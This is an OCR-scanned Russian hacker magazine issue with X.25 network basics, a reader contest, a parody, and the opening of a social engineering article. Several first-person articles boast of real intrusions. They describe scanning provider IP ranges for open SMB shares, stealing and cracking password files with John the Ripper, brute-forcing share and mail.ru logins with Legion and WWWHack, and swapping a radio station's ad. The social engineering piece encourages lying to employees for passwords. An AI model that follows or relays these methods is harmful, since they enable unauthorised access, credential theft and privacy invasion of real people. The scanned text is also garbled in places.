помогу, аты уж потом сам решай: продолжать 
учение или нет. 

NUA (Network Users Address) - как видно из 
названия, сетевой адрес пользователя. Пред- 
ставлен он, как всегда, в виде числа. В об- 
щем, нечто схожее с ТР. 

МОТ (Network User Indentificator) - идентифика- 
тор пользователя сети. Слова, конечно, слож- 
ные, и я знаю, что с первого раза ты, наверно, 
не понял, но если быть проще, то это твой ло- 
гин и пароль - а по-иному, аккаунт сети. 
ОМС (Data Network Identification Code) - код 
идентификации сети. В общем, такие четыре 
цифры, которые задают код сети данных. 


Ну и, наконец, самое глав- 
ное... 


PAD (Packet Assemble Disassembler) - сборщик- 
разборщик пакетов. А по-русски - просто па- 
дина. Эта прога, с помощью которой ты сядешь 
в сети Х.25, столь же необходима тебе, как 
браузер для юзанья инета. Смысл работы про- 


ги состоит в сборке и 
разборке отправляе- 
мых\получаемых паке- 
тов данных. Точнее го- 
воря, это уже делает 
сам ЦКП, а прога прос- 
то отправляет ему дан- 
ные в виде символов. 
Зная это, пора перехо- 
дить к юзанью сетей. 
Как я уже заметил, те- 
бе необходим пад, или 
терминал. С его по- 
мощью ты звонишь в ближайший ЦКП. Скажу 
одно: смысл ЦКП в этих сетях заключается в 
том, что терминал твой (или пад) отсылает 
всю инфу прямо так, в символах, на ЦКП: тот 
эту инфу разбивает на пакеты и передает. И 
обратно: 

ЦКП разбирает тобой получаемые пакеты на 
символы и шлет тебе. 

Сети Х.25 являются как бы промежуточными 
сетями, с помощью которых ты можешь вы- 
лезти и в другие сети. В общем, как на уроках 
географии: все в нашем мире взаимосвязано, 
и получается прямо-таки круговорот сетей в 
природе :). 

Для того чтобы залезть в какую-нибудь систе- 
му, надо знать ее идентификационный адрес. 
Но тут тоже встречается большая трабла, под 
названием NUI (читай выше). В общем, сети 
эти, как и инет, не всегда бесплатные =), и 
для учета времени и вообще верификации 
юзверей введена система паролей и логинов, 
так что не так уж и легко оказывается про- 
лезть в такую сетку. Но, если хорошо поду- 
мать, то и пароли узнать можно :). Это, прав- 
да, уже совсем другая история. 


Юзать 


Зная все это, пора открывать ПАД и юзать- 
юзать-юзать, как завещал великий Ленин. 
Работать с Падом можно в двух режимах: ко- 
мандном и режиме передачи данных. 

Смысл командного режима в том, что ты в оф- 
флайне, так сказать, умелыми пальцами от- 
биваешь на клаве определенные команды. 

А в режиме передачи данных ты уже непос- 
редственно подключен к сети и передаешь 
данные между машинами. Для перехода из 
командного режима в режим передачи дан- 
ных в падах есть сочетание горячих клавиш. 
Обычно это сочетание Ctrl + Р. 

Если со вторым режимом работы все понятно, 
то с первым бы надо еще разобраться. Какие 
команды можно отбивать на падах? 


А вот и они: 


СОМ - установление соединения через сети 
Х.25 


LOC - установление локального соединения 
CLR - порвать установленное соединение 
РАВ? - просмотр текущих значений парамет- 
ров Х.3 

SET - установка своих значений параметров 
X.3 

SET? - установка своих значений параметров 
X.3 и их просмотр 

PROF - установка своих значений всех пара- 
метров X.3 

INT - посылка срочных данных 

ВЕЗЕТ - сброс соединения 

STATUS - статус текущего соединения 

Вот основные команды. Но падина - тоже 
штука не немая, и если что-то не так или 
наоборот - все так, как надо, она подает 
свои признаки жизни, и вот что они обозна- 
чают: 

ОМ - соединение установлено 

ERR - ошибка синтаксиса в команде 

ВЕЗЕТ - существует возможность потери 
данных на пакетном уровне 

Ответ на заданную тобой команду STATUS: 
FREE - соединение отсутствует 

ENGAGED - соединение установлено 

СЕК СОМЕ - разъединение выполнено по при- 
чине: 

0 ОТЕ - удаленный ОТЕ разорвал соедине- 
ние 

1 OCC - номер занят 

3 INV - неправильный запрос средств 

5 NC - сеть переполнена 

9 DER - канал неисправен 

11 № - доступ запрещен 

13 NP - нет доступа 

17 ВРЕ - удаленная процедурная ошибка 
19 ERR - местная процедурная ошибка 

21 PAD - разъединил местный падина 

25 МВС - нет паролей и логина (реверсивной 
оплаты) 

33 INC - несовместимый адрес назначения 
41 МЕС - нет быстрой выборки 

128 ОТЕ - канал зарезервирован 

129 ОТЕ - удаленный ОТЕ не готов 

130 ОТЕ - канал является исходящим 

131 ОТЕ - ОТЕ работает по протоколу Х.28 
132 ОТЕ - ОТЕ отсоединено 

133 ОТЕ - ОТЕ не доступно 

134 ОТЕ - канал не существует 

135 ОТЕ - канал рестартован 

136 ОТЕ - нет связи по Х.25 

137 ОТЕ - адрес удаленного ОТЕ не сущес- 
твует 

138 ОТЕ - нет виртуального канала 

Вот, пожалуй, те основы, которые знать 
просто необходимо. А с остальным разбирай- 
ся сам! Есть огромное количество книг, кото- 
рые тебе в этом помогут. Ищи в сети! Я ду- 
маю, там же ты запросто раскопаешь дауно- 
ладабельный пад =) и инфу о ближайшем 
пуле Х25. Ищи и найдешь! Попро- 

буй - полюбишь =). й 
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GALANT (GALANTTT@OPERAMAIL.COM) 


ривет, огурец! Почему огурец, cnpo- 
Г сишь ты? А я как раз подумал: чем 
огурец хуже перца? К тому же, он не 
такой горький. Но сейчас не об этом. Тебе 
уже, наверное, порядком поднадоели прес- 
ловутые трояны, которых надо заливать, ис- 
кать для этого повод, и все такое. Да? Тогда 
теперь настало время настоящего мужского 
разговора! Знаешь ли ты, что у Маздая есть 
шары? О, нет, не те шары, о которых ты 
подумал, будь бы у него ТЕ шары - 
вряд ли бы они нам помогли. Де- 
ло в том, что добрый дядюшка 
Билли уже залил троян в свои 
операционные системы, просто 
он назвал его по-другому. Более того, 
он вынудил сделать то же и для таких 
крутых операционок, как Unix и им по- 
добные. В далеком прошлом, когда 
компьютеры были большими, мы с то- 
бой маленькими, а ламерство только за- 
рождалось, Дядя Билл, специально для 
того, чтобы мы могли без проблем попа- 
дать в большие корпоративные сети, 
придумал сетевые диски. Назвал он их 
Share Disk, а по-нашенски - зашаренные 
диски или просто шары. И сказал он тог- 
да, что доступ к ним будет осуществлять- 
ся через 139-ый порт, после чего откры- 
лись тысячи 139-ых портов по всему миру. 
Стали появляться демоны для Unix-nogo6b- 
ных операционок, которые открывали 139- 
й порт. Ты представляешь? Все это для нас! 
Нет, конечно, не было бы для нас это таким 
раем, если бы ленивые администраторы и 
пользователи не забывали про такой вели- 
кий сервис. Итак, сейчас мы приручим эту 
лошадь и сбережем уйму денег на пиво с по- 
мощью халявного инета, да и просто повесе- 
ЛИмМСЯ. 


Медные трубы 


Давно было дело, как сейчас помню. Приб- 
лижалось утро, я со своим корешком до- 
ковыривал чью-то почту и, утомлен- 

ный всей этой чужой личной жизнью, 
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И сказал он тогда, что 
доступ к ним будет 
осуществляться через 
139-ый порт, после че- 
го открылись тысячи 
139-ых портов по все- 
му миру. Стали появ- 
ляться демоны для 
Упх-подобных опера- 
ционок, которые OT- 
крывали 139-й порт. 
Ты представляешь? 
Все это для нас! 


захотел чего-то большего. Из закромов на- 
шей необъятной родины - Интернета - я вы- 
тащил парочку незатейливых, но очень по- 
лезных программок. Имя им - Legion и 
SMBScaner. Вообще, мой дорогой друг, эти 
программки делают одно и то же: они берут 
данный тобой диапазон 1Р-адресов и скани- 
руют его на наличие зашаренных дисков. 
Так я и сделал, а диапазон айпишек взял у 
одного очень популярного на этом свете 
провайдера. После того как были выданы 
результаты - а их, на мое удивление, оказа- 
лось несколько больше, чем я ожидал, - мне 
оставалось попасть по кнопке “подклю- 
чить”, и... дело в панамке. Я был поражен 
тем, что ни один компьютер не был защищен 
паролем. После простенькой операции под- 
ключения дисков я в своем Маздае обнару- 
жил несколько красивейших иконок со стре- 
лочками... Как выяснилось, я попал в мир 
музыки. Компьютер, доверху набитый MP3- 
шками, оказался машиной одной из радиос- 
танций (вот ведь, нашли у кого хоститься). 
“Вот это жизнь”, - подумал я, слушая чей-то 
новейший, еще не доделанный микс. Но тут 
меня озарило - я нашел MP3 с рекламой. Да, 
и в нашем деле можно наткнуться на этот 
двигатель торговли. Недолго мне пришлось 
соображать, что и к этому компу у меня ес- 
ть абсолютные права. Быстренько забацав 
свой вариант, я заменил файл с рекламой и 
настроился на их волну в ожидании. Вот 
тогда я и прославился - видимо, сонный 
диск-жокей не очень-то слушал, что там у 
него в эфир пошло, и моя реклама проигра- 
ла полностью. Это был мой текстовичок о 
хакерах =). 


Вот тогда я и просла- 
вился - видимо, сон- 
ный диск-жокей не 
очень-то слушал, что 
там у него в эфир 
пошло, и моя рекла- 
ма проиграла полнос- 
тью. 


Женька-потрошитель 


Слава не затмила мне разум =), и по- 
шел я дальше по найденным мной 
компам. А там меня ждали просто 
незаменимые файлы для моего 
семейного бюджета. На их 
дисках я нашел: статистику 
всех входов в Интернет, 
архив этой самой статис- 
тики, скрипты на терми- 
нальный вход и пароч- 
ку файлов, о кото- 
рых я тебе рас- 
скажу под- 
робнее. 
Ме- 


ня сразу 
привлекли их 
имена - они звучат так 
же мелодично, как и звуки 
разбрызгивания крови в твоей 
любимой игре = это 
“PASSFILE.OLD” и “PASSFILE.0”. В 
файле PASSFILE.OLD я обнаружил 
строки, выглядевшие так: 
“Login: * #4 #4 * User 
name:/home/login:/etc/false”. 

Как правило, звездочки вместо па- 
ролей означают не то, что паролей 
тебе не видать, а только то, что 
они лежат в другом месте. Когда я 
увидел, что в этом файле более 
1000 строк, до меня дошло, куда я 
попал, и я судорожно полез во вто- 
рой файл. Там меня ждали строки 
вроде этой: 
“maxim:CX5uAGBvr2w5U:1013:10- 
12:Maxim Chebatorenko:/tmp:/etc/false”. 
Сразу скажу, что в подобном случае нам с 
тобой интересны будут только первые два 
поля. Первое поле - это логин, записанный 
как есть. А второе - пароль, но с ним слож- 
нее, он зашифрован. Алгоритм шифрования 
придумывали определенно не ламеры, он 
создан так, что пароль, будучи единожды за- 
шифрованным, не может быть расшифрован 


Не успел я 
открыть сле- 
дующую бу- 
тылку пива, 
как пароль 
сдался. Не 
поверишь, 
пароль сос- 
тоял из трех 
одинаковых 
букв! 


с помощью обратного алгоритма. А при про- 
верке пароля операционка шифрует то, что 
ты ввел, и проверяет, совпадает ли резуль- 
тат со вторым полем. Но не отчаивайся, про- 
тив лома нет приема только если нет друго- 
го лома. А нашим с тобой ломом будет очень 
полезная в таких делах программка - John 
The Ripper. Эта программа делает перебор по 
словарику, т.е. она берет слова из специаль- 


HANABA 


Horo файла, именуемого словарем, шифрует 
их и проверяет - совпало или нет. И таким 
образом трудится до тех пор, пока не совпа- 
дут шифры, ну или не кончится словарь. 
Быстренько скачав словарик возможных па- 
ролей на 30кб, я отдал файл PASSFILE.O 
Женьке Рипперу, который, помолчав 5 ми- 
нут, выдал мне первый пароль. Я расплылся 
в счастливой улыбке, и, пока пароли стека- 
ли ко мне, рылся в остатках тех дисков, что 
я нашел. Надо отметить, что я не нашел там 
игр или порнухи (так что непонятно, чем за- 
нимаются админы этого провайдера). Хотя, 
конечно, я искал не игры, а логи. Не очень- 
то мне хотелось получать по голове за ка- 
кие-то мелочи. :) Но, к моему разочарова- 
нию, я не обнаружил ничего хоть как-то на- 
поминавшего логи входов на шары. За это 
время я внимательно изучил структуру их 
систем - кстати, системы у них были разные: 
как Маздай 98/NT, так и FreeBSD. Ничего не 
найдя, я пришел к выводу, что логов у них 
просто нет, и забил на все это, наслаждаясь 
видом появляющихся строк с паролями в 
процессе расшифровки найденного мной 
файла. Ну, несложно догадаться, что если ты 
можешь читать это - то я еще жив, а это зна- 
чит, что я был прав: логов у них и правда не 
было. У тебя, наверное, мелькали мысли про 
совесть или честность? Да у меня тогда тоже, 
я честно подумывал о том, чтобы обо всем 
этом сообщить администратору. Но, как по- 
казывает практика, наши фирмы пока еще 
не научились ценить труд хакера, а посему я 
промолчал. Очень интересная тенденция: 
спустя 2 года пароли продолжают работать. 
Я поражен: на каждом углу говорится, чтобы 
пароли регулярно меняли, чтобы логи прос- 
матривали, и при этом у людей пропадает со 
счета по 100 часов, и все что они делают - 
это идут и доплачивают. Нет, брат, нет ла- 
мерству конца в этом мире. 


Логин - Админ 


Ах да, чуть не забыл, на этом все не закон- 
чилось, Взял я подсеть другого провайдера. 
И что ты думаешь? Правильно, и там тоже 
были открыты шары. Но, видно, админы это- 
го провайдера меньше любили пиво и были 
чуть осмотрительнее, на их сетевых дисках 
стояли пароли. Правда, и тут за нас умные 
дядьки уже подумали. В Legion встроен пе- 
реборщик паролей на шары. Сунув Legion'y 
все тот же потертый словарик возможных 
паролей, я сказал, что логин admin. He ус- 
пел я открыть следующую бутылку пива, как 
пароль сдался. Не поверишь, пароль состоял 
из трех одинаковых букв! Я думаю, не стоит 
продолжать, потому как вижу - у тебя уже 
руки чешутся. Единственное, что могу тебе 
пожелать - это не крушить все что тебе под 


руку попалось, а соби- 
рать интересную инфор- 
мацию. Помни, информа- 
ция - сила. Я до сих пор 
на этих паролях сижу :), 
а все благодаря тому, что 
никто не заметил моего 
присутствия на компью- 
тере с паролями (чего не 
скажешь об остальных 
компах, на которых я по- 
бывал). Конечно, надо 
выразить благодарность 
админам, которые забыли 
разве что только выво- 
дить приветствие при 
входе на шары. А вот все 
остальное сделали так, 
чтобы мне не нужно было 
напрягаться. 


3bl 


Проанализировав рас- 
шифрованные пароли, я 
обнаружил некую зако- 
номерность. Она заклю- 
чалась в том, что не был 
расшифрован ни один 
пароль, в котором при- 
сутствовали сразу малые 
и большие буквы и цифры вместе с ними. 
Вот такая вот мораль - если не хочешь, что- 
бы твой пароль схавал какой-то случайный 
прохожий, сделай его нерасшифруемым. В 


^ 


все еще не было. 


Сереачина 50- 


Наступило время, когда компы начали использовать не только в тех 3a- 
ведениях, где их строили и изучали, но и в некоторых доселе не видев- 
ших этого чуда местах: в основном, в областях, связанных с научными 
разработками, в области космических исследований, а также в вычисли- 
тельных центрах. В связи с тем, что кто-то должен был обслуживать эти 
компы, программеры начали потихоньку выползать из своих исследова- 
тельских центров и лабораторий на глаза обычным людям. Не удиви- 
тельно, что именно их начали повсеместно называть компьютерщиками. 
На долю же инженеров выпало изучение и совершенствование машин. 
Они начали прокладывать самые первые экспериментальные сети в 
своих учреждениях. Компы заметно уменьшились в размере. Хакеров 
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этом мире ламеров надо самому заботиться 
о своем. Будь это деньги, сай- 
ты или твой любимый порно- 


сервер. й 


чи»! 


ых 


НЯНЕР > PEBPAND 701 


ривет, перец! Помнишь, в прошлом 
Г номере Спеца, мы объявили конкурс 

вместе с провайдером Ньюкомпорт? 
Ну, так вот: у нас целая куча победителей! 
Десять человек получат ценные призы и по- 
дарки от журнала Х и упомянутого славного 
провайдера! 


Вот имена героев: 


holmes <holmes@omen.ru> 
sharic_mailru <sharic@mailru.com> 
Denis <danissim@pisem.net> 
Антон <obladioblada@chat.ru> 
JoeBlack <joe_black@freemail.ru> 
System makfunction 
<system.malfunction@gmx.net> 
XenoiD_BoX <superbox@inbox.ru> 
Ovecha <ovecha@mail.ru> 
MazeFAQer <mazefager@mail.ru> 
Maddoc <maddoc@mail.ru> 
Mwbcat <mwbcat@chat.ru> 


Мотай на yc. 


Ты не выиграл в прошлый раз? Не отчаи- 
вайся! Вот тебе условия следующего кон- 
курса. Выбери правильные варианты отве- 
та на следующие вопросы, и пришли по ад- 
ресу холодсобакахакерточкару. 


Победитель получит ЯЩИК ПИВА “КЛИН- 
СКОЕ” (офигеть! - прим. Глав. Ред.), сле- 
дующие два победителя - по пол-ящика, и 
оставшиеся четверо - по четверти ящика. 


1. Как зовут человека, кото- 
рый нарисовал “Ghost т the 
shell”? 


A. Масамунэ Широ 
Б. Лао Чен 

В. Джао Е 

Г. Ю Ань Кай 


2. Маганый - это... 


РАЗОЯЧЯ 


А. CBetno-py- 
сый цвет волос 
Б. Плохой, не- 
хороший, злой 

В. Мертвый по- 
росенок 

Г. Вид каленого 
клинка 


3. Еламок 
— это... 


А. Разновид- 
ность японской 
мультиплика- 
ЦИИ. 

Б. Валяная 6e- 
лая шапка 

В. Фамилия ве- 
дущего менеджера Микрософт в Рос- 
сии 

Г. Марка польского автопроизводи- 
теля 


4. Лабец - это... 


А. Распиленное вдоль бревно 
Б. Черепная кость животного 
В. Деталь шарико- 
ПОДШИПНИКОВОГО 
механизма 

Г. Часть вольфра- 
мовой НИТИ В 
лампе 


5. Лалаки - 
это... 


А. Десны 

Б. Мобильник 
(обиходное назва- 
ние) 

В. Настоящая фа- 
милия Сергея Пок- 
ровского 

Г. Финские сани й 


Почтовымчц 


GALANT <GALANTTT@OPERAMAIL.COM> 


apoB, перец. Ты стал 
взрослым и теперь 
можешь сотнями ва- 
лить неугодные сервера? Тебе 
просто смешно смотреть на 
администраторов сайтов, 
рассуждающих о безопас- 
ности? Ты не в состоя- 
нии заснуть, если твой 
злейший враг на ночь 
не отформатирует в 
очередной раз вин- 
честер, так и не изба- 
вившись от твоего ви- 
руса? А вот я расска- 
жу тебе историю, ко- 
торая случилось со 
мной, когда я был 
еще совсем малень- 
ким и безобидным. Не 
знаю, надо ли делать 


из нее какие-то выво- 
ды. Просто послушай. 


Как-то раз 


Сидел я как-то за род- 
ным писюком и раз- 
мышлял о смысле жиз- 
ни. Нет, нет, не вол- 
нуйся, с крышей у ме- 
ня все нормально, зво- 


BYAUEPUSM 
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нила недавно, интересовалась, как у меня де- 
ла. А вот мои недолгие размышления привели 
меня к мысли, что как-то давно я не развле- 
кался по-настоящему. А какие бывают развле- 
чения? Подглядывать за девушками в замоч- 
ную скважину? Заманчивое предложение, но 
это надо куда-то идти, а вставать так не хочет- 
ся... А чем привлекательно подглядывание в 
замочную скважину? Тем, что ты проникаешь в 
чужую личную жизнь, когда в нее тебя ну ни- 
как не хотят звать. Руки сами потянулись к 
кнопкам, и через несколько минут я уже раз- 
думывал, как бы мне почитать чужую почту. 
“Дело это нехитрое, - скажешь ты, - заслал 
троянского коня, и читай в свое удоволь- 
ствие.” Так-то оно так, но тратить время на 
эти, уже порядком приевшиеся, забавы мне 
что-то не захотелось. Тянуло к чему-то ориги- 
нальному - и такому, что ясно показало бы, 
как опасно не пускать меня в свою личную 
жизнь :). Но какой почтовый сервис выбрать? 


Чтение переписки английских пользователей 
меня не устраивало, и поэтому было решено 
остановиться на российском сервере. А какой 
у нас самый известный российский е-тай сер- 
вис? Правильно, тай.ги. Хотя о взломах тай.ги 
было написано уже порядочно, ничего сложно- 
го не хотелось, и мысли лениво блуждали от 
окошка с логином к окошку с паролем. Что бы 
такое придумать? И вдруг абсурдная идея по- 
сетила голову: “А почему два окошка?" Почему 
не одно? Насколько проще было бы: заходишь 
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ты Ha сайт, a тебя так строго и официально 
спрашивают “Как вас 30ByT?”. И ты, нисколько 
не напрягаясь, вводишь фамилию соседа и це- 
лый час отвечаешь на письма его знакомым 
девушкам. Нет, тут какие-то пароли понапри- 
думывали. И вдруг неожиданная идея мель- 
кнула в сознании. А почему обязательно логин 
и пароль должны быть разными? Разве на всех 
сайтах я сознательно придумывал логин и па- 
роль? Ага, сейчас, а потом забудешь его и ищи 
свищи... Поэтому часто дело ограничивалось 
только самым простым “12345"/"12345" :). По- 
чему бы не попробовать? 


Попытка - не пытка 


Первые несколько попыток такого нехитрого 
перебора не увенчались успехом, и мысли 
опять лениво потекли по своим направлениям. 
Компьютер моргнул лампочками и тоже заду- 
мался, ожидая указаний. Я продолжал пере- 
бор. В уме всплыла фраза: “пусть трактор ра- 
ботает, он железный...". А чем мой компьютер 
хуже трактора? Я ласково погладил его по бе- 
лому корпусу и почему-то подумал, что ника- 
кой трактор с ним не сравнится. “Ладно, - ска- 
зал я ему, - пришло время тебе поработать за 
меня”. Из бескрайних просторов сети была 
выужена программа WWWHack, как раз пред- 
назначенная для проникновения на защищен- 
ные паролем сайты. А чем \МЕВ-интерфейс 
mail.ru не защищенный сайт? Следуя принято- 
му решению, я решил настроить программу для 
перебора логинов и паролей, с ними совпадаю- 
щих. Но откуда брать логины? Не вводить же 
вручную. И тут на помощь пришел недавно вы- 


sal eal cal ва 


качанный из сети файл с самыми распростра- 
ненными именами. В самом деле, какое слово 
ближе всего человеку, плохо разбирающемуся 
в компьютерах? Логин? Я сказал - плохо разби- 
рающемуся в компьютерах. Пароль? Ну не нас- 
только же ему плохо... По моему, “имя” - это са- 
мое то, близкое, родное, то, что самым первым 
приходит на ум, когда тебя в Сети о чем-то 
спрашивают. Опять же, после бурной бессон- 
ной ночи, я не всегда свою версию BIOS вспо- 
минаю, а что уж говорить о каком-то пароле... 


Если забыл имя - можно посмотреть в паспор- 
те, ну или, на худой конец, спросить у кого-ни- 
будь из населяющих квартиру жителей. Итак, 
решено. 


Перебор 


Скормленный ему файл WWWHack проглотил 
не поморщившись. На этом его действия и за- 
кончились. Что такое? Все-таки компьютер 
имеет определенное сходство с трактором, 


пока его не подтолкнешь, он не заработает. 
Итак, вроде бы ввел адрес сайта, который 
спрашивает пароль, указал файл с паролями, 
но дело опять как-то не клеилось. А как, ин- 
тересно, программа узнает, правильный ли 
пароль она подобрала? Должен же быть ка- 
кой-то критерий. В качестве критерия была 
выбрана фраза “извините, пароль неверный”. 
И тогда ее отсутствие означало бы, что мои 
старания увенчались успехом. Затаив дыха- 
ние, я нажал на кнопку и стал ожидать ре- 


=! Интернет-магазин с доставкой на дом 


Заказ по интернету 


Ир: //www.e-shop.ru 
e-mail: sales@e-shop.ru 


e~shopo 


http://www.e-shop.ru 


(095) 258-8627 
(095) 928-6089 
(095) 928-0360 
(812) 311-8312 


Tonbko 8 Mapta 


на все заказы, поступившие от прекрасной половины 
человечества предоставляется $ КИДКА 8% 


(o>) 
© 
(o>) 
NR 
A 


(US) Fantavision 


$79.99 


(US) Oni 


ig SSX Snowboard 


$119.99 $79.99 


(US) Basic Memory Card (US) PSX-2 Controller (US) Memory Card 8 Mb (US) Racing Wheel 


#9 $3) 


Заказы по телефону можно сделать с 10.00 до 19.00 без выходных. 


В нашем магазине действует услуга 48 часов Money Back см.Подробности на 
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зультата. Модем дружелюбно подмигивал, цифры на экране сме- 
няли друг друга, пароли все не подходили. И вот, когда я решил 
прекратить эту бесплодную затею, однообразие на экране сме- 
HUNOCb на надпись “Пароль найден”. Меня охватило воодушевле- 
ние, и, действительно, \/\М/М/НасК оправдал мои ожидания. Сло- 
варика хватило на то, чтобы, за еще полчаса перебора, из 150 
вариантов верными оказались восемь. Абсолютно без моего 
участия я получил еще 8 почтовых ящиков :). Срочно в сети был 
найден словарик часто встречающихся логинов, наименований 
этак на 500, который сразу же был скормлен WWWHack’y. Неу- 
томимый взломщик! Вот как надо работать. Следующая пара ча- 
сов заставила меня усомниться в так расхваливаемом повыше- 
нии уровня компьютерной культуры у современных пользовате- 
лей, так как количество полученных логинов уже перевалило за 
20. Я решил, что на сегодня достаточно и страсть к чужим пись- 
мам будет утолена на долгие месяцы. Но в уме уже зрели гран- 
диозные планы о том, какую еще пользу мне может принести 
сделанное открытие. Всю ночь в голове крутились длинные но- 
мера кредитных карт и плавающие в море секретной информа- 
ции мешки с деньгами. Следующее утро оказалось не менее пло- 
дотворным, так как мой друг, которого я попросил мне помочь, 
сообщил еще о пяти паролях. Дело принимало занятный оборот. 
Решив почитать чужую почту, я вдруг наткнулся на способ абсо- 
лютно спокойно заниматься взломами сайтов с паролями, поль- 
зуясь неопытностью пользователей... 


Как мы не срубили чужих денег 


Несомненно, чужая почта - это очень и очень интересно, но ведь 
нельзя останавливаться на достигнутом, и поэтому, после зре- 
лых размышлений, было решено заняться чем-нибудь более 
сложным, благо на вооружении у нас все же не трактор, и косить 
можно не только траву. В качестве объекта для следующего 
эксперимента был выбран сайт компании, которая предлагает 
web-macTepam заработать деньги с помощью баннеров, разме- 
щенных на их сайтах. Следовало ожидать, что серьезная компа- 
ния не настолько беспечна по отношению к своим пользовате- 
лям, но нет, все оказалось настолько же просто. Правда, отно- 
шение количества добытых паролей к количеству перебранных 
значительно уменьшилось. Это и понятно, люди более ответ- 
ственно относятся к деньгам, чем к собственной переписке. Но и 
мы не лыком шиты, в ход пошли все словари, которые можно бы- 
ло найти в Сети. Сыграл роль и тот фактор, что веб-мастера на- 
род более продвинутый и не вводят в качестве пароля что попа- 
ло. Но, несмотря на это, пароли все же были, и осталось прове- 
рить, нет ли на их эккаунтах денег. И вот тут нас ждало доста- 
точно сильное разочарование, так как эти пользователи относи- 
лись к зарабатыванию денег точно так же, как и к выбору паро- 
ля. Нет что бы сначала деньги зарабатывать научились, а потом 
в веб-мастера лезли. Никакой культуры у современных пользо- 
вателей. Поэтому в итоге мне с другом пришлось подыскивать 
другое место для наших экспериментов =). 


Хеппи енд 


Вот такая вот нехитрая история. И если ты мне скажешь, что ни- 
чего сложного в этом не было, я, не задумываясь отвечу, что 
красивый взлом не обязательно должен быть сложным, но обя- 
зательно эффективным. В данном случае эффективность нали- 
uo. А вот программа WWWHack мне еще неоднократно помогла, 
но это уже совсем другая история. Перебор продол- 

жается! й 
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СПЛОВОБЛУОИЕ 


ЬЫПИНА 
о Море 


GALANT (GALANTTT@O PERAMAIL.COM) 


создала сеть админов. 

U И появились ламеры, юзеры, хаке- 
ры и серверы... 

И повелел траффик увеличить пропускную 

способность каналов, и появилось оптово- 

локно. 

И захотели хакеры наказать ламеров, и 

появились нюкеры, флудеры и бомберы. 

И захотели ламеры защититься от хакеров, 

и появились файрволы, логины и пассвор- 

bl... 

Ho не успокоились злобные хакеры да и 

создали пвэлхаки, лофты и джоны риппе- 

ры... 

И повелела им сеть разговеться, да и поя- 

вились ноды, хабы и поинты. 

И всевеликая Фидо преградила им дорогу 

своими модерами, флеймами и рулесами... 

Но не отступили хакеры и позвали краке- 

ров, любителей вареза. 

И пошли на блинах по сети великой крак- 

нутые исходники и порипанные сидюки... 

Да во славу коннекта и во восхваление BO- 

ДА... 

И менялись меговые винты на гиговые, и 

процы разгонялись во всеуслышанье... 

А юзеры бороздили Великую Паутину да и 

восхваляли провайдеров... 

А провайдеры, от дисконнектов уставшие, 

придумывали коварные способы забаннить 

юзеров... 

И появлялись Линуксоиды, Полуосьники и 

Макинтошевцы... 

И не отступали хакеры, создавали “2600”, 

“Сеть” и “Нейромансера”... 

И помогали им любители вареза, поставляя 

Напстеры и Гнутеллы с кривыми кодерами. 

И зип-драйвы сменили косые флопы, и 

лайнс пришел на смену тетрису, и появил- 

ся МекУорриор. 

А параллельно шли процессы неведомые, 

простым ламерам непонятные... 

То думеры и квакеры оттачивали свое мас- 

терство, кланами нападая на беззащитных. 

И Джон Кармак помогал им творить безза- 

коние, не замечая туч над горизонтами 

бескрайними. 


А тучи те рождались в Силиконовой доли- скоро на просторы софта беззащитные, 

не, И заполонят их. 

И имя им было странное, доселе неслы- А простые смертные со страхом и ненавис- 
ханное, тью 

Навеки проклят тот, кто 
знает их название, 
И снизойдут 
они 


Называть их будут мелкомягкие, 
Что значит: “пришедшие с ми- 
ром, но оставившие разру- 


шения"... 
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ТРОЯНЕЧЦЧ, В МОЗГАХ, 


или немного O 
СОЦИАПЬНОЧ ЧНЖЕНЕРЧИЦИ 


NOAH (NOAH@INBOX.RU, UIN 983332) 


арова, дружище :)! Kak де- 
лишки, много всего успел 
нахакать? Wow, круто!! 
Только смотри, не засиживайся особо за ком- 
пом - колоть и ломать, конечно, здорово, и 
доки всякие читать интересно, но знай, что 
настоящий хацкер хакает не только когда на- 
ходится рядом со своим железным другом. 
Хакать - это как философия, как принцип 
жизни. Правильный хацкер должен прожить 
свою жизнь хакаючи :). Он должен уметь ха- 
кать и в реале! Эй, отложи свой фрикнутый 
мобильник, я совсем не то имел в виду!!! Ну, 
млин, A хотел аккуратно перевести разговор 
на социальную инженерию, а ты со своим мо- 
бильником сбил меня с толку :). Еще хорошо, 
что я про фрикинг не начал рассказывать, а 
то был бы облом, потому что эта статья про 
хаканье людей, а не телефонов - про social 
engineering :). Хотя о телефонах речь тоже 
пойдет ;). 


ХАЦКЕРСКИЙ СОЦИАЛЬ- 
НЫЙ ИНЖЕНЕРИНГ 


Понимаешь, иногда хакнуть какую-нибудь 
сеть бывает настолько трудно, настолько ги- 
морно, что хакер пытается добыть необходи- 
мую для ее хаканья информацию в реале. 
Намного проще обмануть доверчивую сотруд- 
ницу-бухгалтера конторы, чья сеть хакается, 
и выведать у нее пароль ее аккаунта (а это 
уже что-то), чем обходить твердокаменную 
защиту, которую выстроил вокруг своей сети 
админ этой конторы. Процесс выманивания 


Запомни, что наглость - самый глав- 
ный хацкерский “софт” социального 
инженера. Если при разговоре с 
“клиентами” голос у тебя будет дро- 
жать, а заплетык языкаться :), ты ниче- 
го не добьешься! Веди себя нагло и 
уверенно, так, как бы ты себя повел, 
если бы на самом деле был тем чело- 
веком, за которого себя выдаешь. 


информации о ломаемой системе у людей из 
реала (впрочем, не обязательно из реала) на- 
зывается social engineering (социальная ин- 
женерия). Это целое хацкерское искусство. 
Чаще всего хакеры инженерят по телефону, 
но иногда доходит до того, что приходится 
наниматься в эту контору на какую-нибудь 
мелкую должность (как правило, это бывает 
должность уборщика или курьера), чтобы 
иметь возможность работать “изнутри”. Бы- 
вает, что одна операция длится несколько ме- 
сяцев. Смысл социальной инженерии состоит 
в том, чтобы дезинформировать, обмануть, 
запутать человека (“клиента”), заставить его 
поверить тебе, а потом получить с этого ка- 
кую-то выгоду. Вообще говоря, социальная 
инженерия - это то, с чем ежедневно сталки- 
ваются все люди, вне зависимости от того, ха- 
керы они или нет. Когда ты тихонько выпус- 
каешь весь свой вирусный парк на компы в 
обожаемом тобой учебном заведении, а по- 
том, в течение шести часов, делая огромное 
одолжение преподу, сам же травишь их анти- 
вирусником - это социальная инженерия. Ког- 
да ты говоришь своей девушке: “В твоих гла- 
зах космос!!!", а сам думаешь: “Черт, вот это 
буфера!" - это социальная инженерия. Когда 
ты в поликлинике фальшиво хрипишь и каш- 
ляешь как старый радиоприемник и просишь 
дать тебе справку - это социальная инжене- 
рия. Когда ты просишь у отца ключи от маши- 
ны и скромно так намекаешь на то, что она 
грязная, и ты хотел бы ее всего лишь помыть 
- это социальная инженерия. 

Но мы не будем рассматривать social engineer- 
